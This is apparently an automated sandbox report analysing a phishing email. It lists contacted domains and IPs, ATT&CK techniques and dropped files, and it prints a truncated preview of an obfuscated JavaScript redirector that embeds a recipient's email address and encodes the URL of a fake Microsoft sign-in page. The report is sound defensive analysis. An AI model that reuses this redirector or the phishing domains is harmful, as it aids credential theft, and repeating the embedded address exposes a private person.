Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information queried: ProcessInformation
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeQueries volume information: C:\Program Files (x86)\Microsoft Office\root\Office16\AI\WordCombinedFloatieLreOnline.onnx VolumeInformation
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
DLL Side-Loading		1
Process Injection		1
Masquerading		OS Credential Dumping1
Process Discovery		Remote ServicesData from Local System2
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Registry Run Keys / Startup Folder		1
DLL Side-Loading		1
Process Injection		LSASS Memory1
File and Directory Discovery		Remote Desktop ProtocolData from Removable Media1
Non-Standard Port		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
Registry Run Keys / Startup Folder		1
DLL Side-Loading		Security Account Manager12
System Information Discovery		SMB/Windows Admin SharesData from Network Shared Drive1
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture2
Application Layer Protocol		Traffic DuplicationData Destruction

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
bg.microsoft.map.fastly.net0%VirustotalBrowse
sopbtech.store4%VirustotalBrowse
www.google.com0%VirustotalBrowse
code.jquery.com1%VirustotalBrowse
s-part-0044.t-0009.fb-t-msedge.net0%VirustotalBrowse
d26p066pn2w0s0.cloudfront.net0%VirustotalBrowse
server.povbtech.store3%VirustotalBrowse
api.ipify.org0%VirustotalBrowse
logo.clearbit.com0%VirustotalBrowse
s-part-0029.t-0009.fb-t-msedge.net0%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/ZVHF1XTO/Play_VM-NowVWAV.html0%Avira URL Cloudsafe
blob:https://ksvbotech.store/87a84b40-d177-4cc6-9e01-21c142cae0ba0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
ksvbotech.store
66.29.137.93
truefalse
    		unknown
    bg.microsoft.map.fastly.net
    		199.232.210.172
    		truefalseunknown
    d26p066pn2w0s0.cloudfront.net
    		13.32.27.77
    		truefalseunknown
    s-part-0044.t-0009.fb-t-msedge.net
    		13.107.253.72
    		truefalseunknown
    s-part-0029.t-0009.fb-t-msedge.net
    		13.107.253.57
    		truefalseunknown
    code.jquery.com
    		151.101.194.137
    		truefalseunknown
    sopbtech.store
    		199.188.200.183
    		truefalseunknown
    server.povbtech.store
    		185.174.100.20
    		truefalseunknown
    www.google.com
    		142.250.184.196
    		truefalseunknown
    api.ipify.org
    		104.26.13.205
    		truefalseunknown
    _8020._https.server.povbtech.store
    		unknown
    		unknownfalse
      		unknown
      logo.clearbit.com
      		unknown
      		unknowntrueunknown

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      blob:https://ksvbotech.store/87a84b40-d177-4cc6-9e01-21c142cae0batrue
      • Avira URL Cloud: safe
      		unknown
      file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/ZVHF1XTO/Play_VM-NowVWAV.htmlfalse
      • Avira URL Cloud: safe
      		unknown

      World Map of Contacted IPs

      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs

      Public IPs

      IPDomainCountryFlagASNASN NameMalicious
      52.113.194.132
      		unknownUnited States
      		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
      142.250.184.196
      		www.google.comUnited States
      		15169GOOGLEUSfalse
      66.29.137.93
      		ksvbotech.storeUnited States
      		19538ADVANTAGECOMUSfalse
      216.58.212.138
      		unknownUnited States
      		15169GOOGLEUSfalse
      13.32.27.77
      		d26p066pn2w0s0.cloudfront.netUnited States
      		7018ATT-INTERNET4USfalse
      52.109.68.130
      		unknownUnited States
      		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
      142.250.186.174
      		unknownUnited States
      		15169GOOGLEUSfalse
      185.174.100.20
      		server.povbtech.storeUkraine
      		8100ASN-QUADRANET-GLOBALUSfalse
      20.42.72.131
      		unknownUnited States
      		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
      13.107.253.57
      		s-part-0029.t-0009.fb-t-msedge.netUnited States
      		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
      142.250.181.234
      		unknownUnited States
      		15169GOOGLEUSfalse
      199.188.200.183
      		sopbtech.storeUnited States
      		22612NAMECHEAP-NETUSfalse
      151.101.130.137
      		unknownUnited States
      		54113FASTLYUSfalse
      74.125.206.84
      		unknownUnited States
      		15169GOOGLEUSfalse
      13.107.253.72
      		s-part-0044.t-0009.fb-t-msedge.netUnited States
      		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
      2.19.126.151
      		unknownEuropean Union
      		16625AKAMAI-ASUSfalse
      239.255.255.250
      		unknownReserved
      		unknownunknownfalse
      52.109.28.47
      		unknownUnited States
      		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
      142.250.186.131
      		unknownUnited States
      		15169GOOGLEUSfalse
      151.101.194.137
      		code.jquery.comUnited States
      		54113FASTLYUSfalse
      104.26.13.205
      		api.ipify.orgUnited States
      		13335CLOUDFLARENETUSfalse

      Private

      IP
      192.168.2.16

      General Information

      Joe Sandbox version:41.0.0 Charoite
      Analysis ID:1513770
      Start date and time:2024-09-19 11:35:56 +02:00
      Joe Sandbox product:CloudBasic
      Overall analysis duration:
      Hypervisor based Inspection enabled:false
      Report type:full
      Cookbook file name:defaultwindowsinteractivecookbook.jbs
      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
      Number of analysed new started processes analysed:18
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • EGA enabled
      Analysis Mode:stream
      Analysis stop reason:Timeout
      Sample name:original (37).eml
      Detection:MAL
      Classification:mal48.phis.winEML@20/33@24/85
      Cookbook Comments:
      • Found application associated with file extension: .eml

      Warnings

      • Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
      • Excluded IPs from analysis (whitelisted): 52.113.194.132, 52.109.28.47, 2.19.126.151, 2.19.126.160
      • Excluded domains from analysis (whitelisted): ecs.office.com, omex.cdn.office.net, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, s-0005-office.config.skype.com, eur.roaming1.live.com.akadns.net, osiprod-uks-buff-azsc-000.uksouth.cloudapp.azure.com, ecs-office.s-0005.s-msedge.net, roaming.officeapps.live.com, uks-azsc-000.roaming.officeapps.live.com, s-0005.s-msedge.net, ecs.office.trafficmanager.net, omex.cdn.office.net.akamaized.net, wu-b-net.trafficmanager.net, a1864.dscd.akamai.net
      • Not all processes where analyzed, report is missing behavior information
      • Report size getting too big, too many NtQueryAttributesFile calls found.
      • Report size getting too big, too many NtQueryValueKey calls found.
      • Report size getting too big, too many NtSetValueKey calls found.

      LLM Input / Output

      InputOutput
      URL: Email Model: jbxai
      {
"brand":["Globi"],
"contains_trigger_text":false,
"prominent_button_name":"unknown",
"text_input_field_labels":["unknown"],
"pdf_icon_visible":false,
"has_visible_captcha":false,
"has_urgent_text":false,
"has_visible_qrcode":false}
      URL: blob:https://ksvbotech.store/87a84b40-d177-4cc6-9e01-21c142cae0ba Model: jbxai
      {
"brand":["Microsoft"],
"contains_trigger_text":false,
"prominent_button_name":"Sign In",
"text_input_field_labels":["Enter Password",
"Forgot Password?"],
"pdf_icon_visible":false,
"has_visible_captcha":false,
"has_urgent_text":false,
"has_visible_qrcode":false}
      URL: blob:https://ksvbotech.store/87a84b40-d177-4cc6-9e01-21c142cae0ba Model: jbxai
      {
"phishing_score":8,
"brands":["Microsoft"],
"sub_domain":"ksvbotech",
"legit_domain":"microsoft.com",
"partial_domain_match":true,
"brand_matches_associated_domain":false,
"reasons":"The domain name 'ksvbotech.store' does not match the brand name or any of Microsoft's known domains,
 and the top level domain'store' is not commonly associated with Microsoft. This discrepancy raises concerns about the legitimacy of the webpage.",
"brand_matches":[false],
"url_match":false}

      Created / dropped Files

      C:\Users\user\AppData\Local\Microsoft\FORMS\FRMCACHE.DAT

      Download File
      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
      File Type:data
      Category:dropped
      Size (bytes):231348
      Entropy (8bit):4.395850586682651
      Encrypted:false
      SSDEEP:
      MD5:F3863188EFE304BD8DFAD46AD3D23A6A
      SHA1:A5008D2678425FACB9A6619D0F0003AD8E65772E
      SHA-256:364B342D16911C04ED1B1781D27B39F4AA1D5508525353B41871291673D7B496
      SHA-512:E4D35D8AEA33277E654BB202366A779DB87A0C279C27863C6B7E60BD61E79FB2017010EF7D053A885B204658D5A2D4DC623DC29D4A62394D5F2068B5F4E5DC46
      Malicious:false
      Reputation:unknown
      Preview:TH02...... ..e.\w.......SM01X...,......\w...........IPM.Activity...........h...............h............H..ht.............h........H^F.H..h\cal ...pDat...h@.8.0.........h..)...G........h........_`Rk...h..).@...I.lw...h....H...8.Wk...0....T...............d.........2h...............k..............!h.............. h)0X..........#h....8.........$hH^F.....8....."hp.I.....0.I...'h.."...........1h..).<.........0h....4....Wk../h....h.....WkH..h..G.p...t.....-h .............+h?.)....h................... ..............F7..............FIPM.Activity....Form....Standard....Journal Entry...IPM.Microsoft.FolderDesign.FormsDescription................F.k..........1122110020000000.GwwMicrosoft...This form is used to create journal entries.........kf...... ..........&...........(.......(... ...@.....................................................................................................................fffffffff........wwwwwwww.p....pp..............p...............pw..............pw..DDDDO..

      C:\Users\user\AppData\Local\Microsoft\Office\OTele\outlook.exe.db

      Download File
      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
      File Type:SQLite 3.x database, last written using SQLite version 3034001, writer version 2, read version 2, file counter 2, database pages 1, cookie 0, schema 0, largest root page 1, unknown 0 encoding, version-valid-for 2
      Category:dropped
      Size (bytes):4096
      Entropy (8bit):0.09304735440217722
      Encrypted:false
      SSDEEP:
      MD5:D0DE7DB24F7B0C0FE636B34E253F1562
      SHA1:6EF2957FDEDDC3EB84974F136C22E39553287B80
      SHA-256:B6DC74E4A39FFA38ED8C93D58AADEB7E7A0674DAC1152AF413E9DA7313ADE6ED
      SHA-512:42D00510CD9771CE63D44991EA10C10C8FBCF69DF08819D60B7F8E7B0F9B1D385AE26912C847A024D1D127EC098904784147218869AE8D2050BCE9B306DB2DDE
      Malicious:false
      Reputation:unknown
      Preview:SQLite format 3......@ ..........................................................................K.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

      C:\Users\user\AppData\Local\Microsoft\Office\OTele\outlook.exe.db-journal

      Download File
      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
      File Type:SQLite Rollback Journal
      Category:dropped
      Size (bytes):4616
      Entropy (8bit):0.13298756720797703
      Encrypted:false
      SSDEEP:
      MD5:9FAEE8C40152D74D82A4C4FD08E6D056
      SHA1:5F7A717E6A872348871DE70EA2D8347770EBFE41
      SHA-256:F943000E64A9ED15AEDB12AF08AB4C0EC6E4D403D98DFABB13849A4D20CFCCB8
      SHA-512:0DBC6DF9A00A8A5F17457C90EEA6761F85DC07F888E9B8D55504760EFF02E3598EDD6D0803AD11764B23AEBDEAE54D27ADB4F28201C0832B0F826DA6F4FDCCA0
      Malicious:false
      Reputation:unknown
      Preview:.... .c.......`.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................SQLite format 3......@ ..........................................................................K.................................................................................................................................................................................................................................................................................................................................................................................................

      C:\Users\user\AppData\Local\Microsoft\Office\OTele\outlook.exe.db-shm

      Download File
      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
      File Type:data
      Category:dropped
      Size (bytes):32768
      Entropy (8bit):0.04442436008866249
      Encrypted:false
      SSDEEP:
      MD5:B1B4E359CEA5C2FAFFB746CD26B2856A
      SHA1:FCB38853DD0AD1B29A3684B594A9BEC45435B149
      SHA-256:E4BA74AA7F033C400A3040C9E9BF75EA517D69B28C5F06C848F8CF8886D4BFC6
      SHA-512:D1694CA782F6702415BFB5CD65646B04AB7FEC46A8157ED7E3ECD656D1C1E04605BD8F29F6A790723BD238357D8076C0284234466E2F623853E5EE93713F01A7
      Malicious:false
      Reputation:unknown
      Preview:..-........................uC....B.b..D.?.W......-........................uC....B.b..D.?.W............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

      C:\Users\user\AppData\Local\Microsoft\Office\OTele\outlook.exe.db-wal

      Download File
      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
      File Type:SQLite Write-Ahead Log, version 3007000
      Category:modified
      Size (bytes):45352
      Entropy (8bit):0.3943716126757746
      Encrypted:false
      SSDEEP:
      MD5:4F1F90BEF169B4BE9D416BF025A4E658
      SHA1:5456A8596BDF193EB2B80EA4A0DC3A1EB92BFD13
      SHA-256:5B5076A7CDAB98B7D2D5192FCEEEADE490AEAE166460EAD1E9BD46FD4D4163D4
      SHA-512:4D9EF1818FBFDED1CD501A586CFF57A441560B55D7A465354401016BFE12A68062D36D25E16585C06D0D462A880259D92A731FA934D940B7ACBF2A946B6D072C
      Malicious:false
      Reputation:unknown
      Preview:7....-............B.b..Ds)..o.............B.b..Di...8..8SQLite format 3......@ ..........................................................................K.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\ZVHF1XTO\Play_VM-NowVWAV (002).html

      Download File
      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
      File Type:HTML document, ASCII text, with very long lines (2092), with CRLF line terminators
      Category:dropped
      Size (bytes):2459
      Entropy (8bit):5.511359010278195
      Encrypted:false
      SSDEEP:
      MD5:1AF87B60820D2A9FCF37480B1AC9C66F
      SHA1:627CD793B5D093CA6D97B03186390031E8214798
      SHA-256:EF5FE4103F48BF735FCF573E80717699C25E45E8AFB570685CF145AEE33410B6
      SHA-512:F14BA5F8A566085322C772F91C95FEDD5D19149BCF1484D81C86EC1D6C545B0242B74BC6D317576D959AC52E3D56C71B54EC13898248C21794F9B4F0C65C88A9
      Malicious:false
      Reputation:unknown
      Preview:<!DOCTYPE html>..<html lang="en">..<head>.. <meta charset="UTF-8">.. <meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <title>Please Wait</title>..</head>..<body>..<p id="uxo" style="display:none;">uday.dukkipati@tdwilliamson.com</p>....<script>..const _0x19e8b5=_0x1be1;function _0xd048(){const _0x2759b6=['16940nTwiYF','2801908EyDxtQ','getElementById','abcdefghijklmnopqrstuvwxyz','2399130RTFwvl','innerText','7najGmm','uxo','1198248hbTyhv','includes','2583790VrRdBf','wcpufdi.tupsf/hftq/nth.iunm','join','://','length','1107852ngmrMf','4771404RMeFKW','location'];_0xd048=function(){return _0x2759b6;};return _0xd048();}(function(_0x5d9d3a,_0x27671e){const _0x11bf02=_0x1be1,_0x4ab80e=_0x5d9d3a();while(!![]){try{const _0x3b5f75=-parseInt(_0x11bf02(0x202))/0x1+-parseInt(_0x11bf02(0x1ff))/0x2+parseInt(_0x11bf02(0x1f4))/0x3+-parseInt(_0x11bf02(0x1f1))/0x4+parseInt(_0x11bf02(0x1fa))/0x5+parseInt(_0x11bf02(0

      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\ZVHF1XTO\Play_VM-NowVWAV (002).html:Zone.Identifier (copy)

      Download File
      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
      File Type:HTML document, ASCII text, with very long lines (2092), with CRLF line terminators
      Category:dropped
      Size (bytes):0
      Entropy (8bit):0.0
      Encrypted:false
      SSDEEP:
      MD5:1AF87B60820D2A9FCF37480B1AC9C66F
      SHA1:627CD793B5D093CA6D97B03186390031E8214798
      SHA-256:EF5FE4103F48BF735FCF573E80717699C25E45E8AFB570685CF145AEE33410B6
      SHA-512:F14BA5F8A566085322C772F91C95FEDD5D19149BCF1484D81C86EC1D6C545B0242B74BC6D317576D959AC52E3D56C71B54EC13898248C21794F9B4F0C65C88A9
      Malicious:false
      Reputation:unknown
      Preview:<!DOCTYPE html>..<html lang="en">..<head>.. <meta charset="UTF-8">.. <meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <title>Please Wait</title>..</head>..<body>..<p id="uxo" style="display:none;">uday.dukkipati@tdwilliamson.com</p>....<script>..const _0x19e8b5=_0x1be1;function _0xd048(){const _0x2759b6=['16940nTwiYF','2801908EyDxtQ','getElementById','abcdefghijklmnopqrstuvwxyz','2399130RTFwvl','innerText','7najGmm','uxo','1198248hbTyhv','includes','2583790VrRdBf','wcpufdi.tupsf/hftq/nth.iunm','join','://','length','1107852ngmrMf','4771404RMeFKW','location'];_0xd048=function(){return _0x2759b6;};return _0xd048();}(function(_0x5d9d3a,_0x27671e){const _0x11bf02=_0x1be1,_0x4ab80e=_0x5d9d3a();while(!![]){try{const _0x3b5f75=-parseInt(_0x11bf02(0x202))/0x1+-parseInt(_0x11bf02(0x1ff))/0x2+parseInt(_0x11bf02(0x1f4))/0x3+-parseInt(_0x11bf02(0x1f1))/0x4+parseInt(_0x11bf02(0x1fa))/0x5+parseInt(_0x11bf02(0

      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\ZVHF1XTO\phish_alert_sp2_2.0.0.0 (002).eml:Zone.Identifier

      Download File
      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
      File Type:ASCII text, with CRLF line terminators
      Category:modified
      Size (bytes):26
      Entropy (8bit):3.95006375643621
      Encrypted:false
      SSDEEP:
      MD5:FBCCF14D504B7B2DBCB5A5BDA75BD93B
      SHA1:D59FC84CDD5217C6CF74785703655F78DA6B582B
      SHA-256:EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
      SHA-512:AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC762480482C5C2E53F803CD9E3973DDEFC68966F974E124307B5043E654443B98
      Malicious:false
      Reputation:unknown
      Preview:[ZoneTransfer]..ZoneId=3..

      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\ZVHF1XTO\phish_alert_sp2_2.0.0.0.eml

      Download File
      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
      File Type:RFC 822 mail, ASCII text, with very long lines (1945), with CRLF line terminators
      Category:dropped
      Size (bytes):30255
      Entropy (8bit):6.089587595810953
      Encrypted:false
      SSDEEP:
      MD5:7A32B97E3D458EC37679C7F38A04384D
      SHA1:AEC9BE54C67B1457A00D1A95867E47863EE1B7A4
      SHA-256:DCC6B54CD23DBD5BE2C0C10CF31CEFCF1EB8882FEC554D51A8AD8B335EC0932B
      SHA-512:CF21A2FA0DDF3F8B6A7F7740C5C36D17B6841FC0935C7F090F00FABCDD5024EBCDCA04577FD7D210D06473EA77AB4361572F77E7E0F3DCB9EE71CAFA823D2D75
      Malicious:false
      Reputation:unknown
      Preview:Received: from SJ0PR08MB7665.namprd08.prod.outlook.com.. (2603:10b6:a03:3f5::12) by DM3PR08MB9118.namprd08.prod.outlook.com with.. HTTPS; Wed, 18 Sep 2024 20:54:24 +0000..Received: from SJ0PR13CA0109.namprd13.prod.outlook.com.. (2603:10b6:a03:2c5::24) by SJ0PR08MB7665.namprd08.prod.outlook.com.. (2603:10b6:a03:3f5::12) with Microsoft SMTP Server (version=TLS1_2,.. cipher=TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384) id 15.20.7982.17; Wed, 18.. Sep 2024 20:54:15 +0000..Received: from SJ1PEPF00001CE3.namprd05.prod.outlook.com.. (2603:10b6:a03:2c5:cafe::d3) by SJ0PR13CA0109.outlook.office365.com.. (2603:10b6:a03:2c5::24) with Microsoft SMTP Server (version=TLS1_2,.. cipher=TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384) id 15.20.7982.9 via Frontend.. Transport; Wed, 18 Sep 2024 20:54:15 +0000..Received: from NAM12-DM6-obe.outbound.protection.outlook.com.. (40.107.243.113) by SJ1PEPF00001CE3.mail.protection.outlook.com.. (10.167.242.11) with Microsoft SMTP Server (version=TLS1_2,.. cipher=TLS_ECDHE_RSA_WI

      C:\Users\user\AppData\Local\Temp\Diagnostics\OUTLOOK\App1726738586013473400_9590DA95-D182-41B4-AA20-77270379C5B9.log

      Download File
      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
      File Type:ASCII text, with very long lines (28758), with CRLF line terminators
      Category:dropped
      Size (bytes):20971520
      Entropy (8bit):0.16156667915991862
      Encrypted:false
      SSDEEP:
      MD5:667EC1E8436A52ADCDD6F2ED56CAA322
      SHA1:ED913375D71FDFCD64D8736B47466B215DFAA2FF
      SHA-256:BFE45215178D6A92DF7A62C348E334B81709B8E0994CF140E0AB3B2D145D6F61
      SHA-512:4E807BBE0E49FB11F82AB9BC24054A60CBCE81A5801CA1FC611A3DD9D6D673AA1A47EF132A59061CE0ACF9003495C84A832EFF3F07E8275DEA8D421077E37C5C
      Malicious:false
      Reputation:unknown
      Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..09/19/2024 09:36:26.046.OUTLOOK (0x18E0).0x18E4.Microsoft Outlook.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Text.GDIAssistant.HandleCallback","Flags":30962256044949761,"InternalSequenceNumber":25,"Time":"2024-09-19T09:36:26.046Z","Contract":"Office.System.Activity","Activity.CV":"ldqQlYLRtEGqIHcnA3nFuQ.4.11","Activity.Duration":13,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":true,"Data.GdiFamilyName":"","Data.CloudFontStatus":6,"Data.CloudFontTypes":256}...09/19/2024 09:36:26.062.OUTLOOK (0x18E0).0x18E4.Microsoft Outlook.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Text.ResourceClient.Deserialize","Flags":30962256044949761,"InternalSequenceNumber":27,"Time":"2024-09-19T09:36:26.062Z","Contract":"Office.System.Activity","Activity.CV":"ldqQlYLRtEGqIHcnA3nFuQ.4.12","Activity.Duration":11838,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":true,"Data.JsonFileMajor

      C:\Users\user\AppData\Local\Temp\Diagnostics\OUTLOOK\App1726738586014166600_9590DA95-D182-41B4-AA20-77270379C5B9.log

      Download File
      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
      File Type:data
      Category:dropped
      Size (bytes):20971520
      Entropy (8bit):0.0
      Encrypted:false
      SSDEEP:
      MD5:8F4E33F3DC3E414FF94E5FB6905CBA8C
      SHA1:9674344C90C2F0646F0B78026E127C9B86E3AD77
      SHA-256:CD52D81E25F372E6FA4DB2C0DFCEB59862C1969CAB17096DA352B34950C973CC
      SHA-512:7FB91E868F3923BBD043725818EF3A5D8D08EBF1059A18AC0FE07040D32EEBA517DA11515E6A4AFAEB29BCC5E0F1543BA2C595B0FE8E6167DDC5E6793EDEF5BB
      Malicious:false
      Reputation:unknown
      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

      C:\Users\user\AppData\Local\Temp\Outlook Logging\OUTLOOK_16_0_16827_20130-20240919T0536250808-6368.etl

      Download File
      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
      File Type:data
      Category:dropped
      Size (bytes):122880
      Entropy (8bit):4.524291097915957
      Encrypted:false
      SSDEEP:
      MD5:F07D05E18D42F0BB09FA978CEA5DF622
      SHA1:7291412A671D7AD927B0A554AA2BFE025D221954
      SHA-256:9BB4928919884DF977DCCB26F9B11D3C9C72671F116E4B0AFACE46DC8B229BD6
      SHA-512:32FF3184FA163DFF4906F0B2748688CD9C3D32C7C1B34AF6802297267797A02FBC3D5D22AB398873443E75F5617D4B18D6BA471F50AB48722F017632A4B823EE
      Malicious:false
      Reputation:unknown
      Preview:............................................................................`...........=.ew...................eJ..............Zb..2...................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1...........................................................@.6<.Y..........=.ew...........v.2._.O.U.T.L.O.O.K.:.1.8.e.0.:.8.6.0.3.4.3.8.0.9.e.c.0.4.8.f.9.9.d.6.d.6.c.e.8.0.e.e.7.2.a.6.2...C.:.\.U.s.e.r.s.\.c.a.l.i.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.O.u.t.l.o.o.k. .L.o.g.g.i.n.g.\.O.U.T.L.O.O.K._.1.6._.0._.1.6.8.2.7._.2.0.1.3.0.-.2.0.2.4.0.9.1.9.T.0.5.3.6.2.5.0.8.0.8.-.6.3.6.8...e.t.l.......P.P.........=.ew...........................................................................................................................................................................................................................................................................................................

      C:\Users\user\AppData\Local\Temp\Outlook Logging\OUTLOOK_16_0_16827_20130-20240919T0536410136-6788.etl

      Download File
      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
      File Type:data
      Category:dropped
      Size (bytes):16384
      Entropy (8bit):3.597916786515241
      Encrypted:false
      SSDEEP:
      MD5:FEA7B64B4745C33A6258F1E1119D0702
      SHA1:5F3855A566E3458D84BE5D1C9F30EC8F76541930
      SHA-256:78D4B409CDD80C8FE1FAE16096B56AC920A172DAE2F7266616BEE1C2000C618B
      SHA-512:E01F516DA778DB03D9AD62E45D0A55D62681DF98EA2099440FD13770F4084D6408EC8A8C320223236A5A155CEB836B262C3799FFA44898AE67AB8F97FC42FA86
      Malicious:false
      Reputation:unknown
      Preview:............................................................................`...\.......s..nw...................eJ.......N.nw...Zb..2...................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1...........................................................@.6<.Y..........s..nw...........v.2._.O.U.T.L.O.O.K.:.1.a.8.4.:.5.2.1.2.3.e.c.0.b.f.d.c.4.c.b.e.9.d.e.7.a.0.3.1.9.e.4.9.d.c.4.4...C.:.\.U.s.e.r.s.\.c.a.l.i.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.O.u.t.l.o.o.k. .L.o.g.g.i.n.g.\.O.U.T.L.O.O.K._.1.6._.0._.1.6.8.2.7._.2.0.1.3.0.-.2.0.2.4.0.9.1.9.T.0.5.3.6.4.1.0.1.3.6.-.6.7.8.8...e.t.l.......P.P.\.......s..nw...........................................................................................................................................................................................................................................................................................................

      C:\Users\user\AppData\Roaming\Microsoft\Office\MSO3072.acl

      Download File
      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
      File Type:data
      Category:dropped
      Size (bytes):30
      Entropy (8bit):1.2389205950315936
      Encrypted:false
      SSDEEP:
      MD5:5E20510C5868A6BE58830457AE7FE3D5
      SHA1:026C954DD94F1FDD78B68AE9F0E70E0CA01530B4
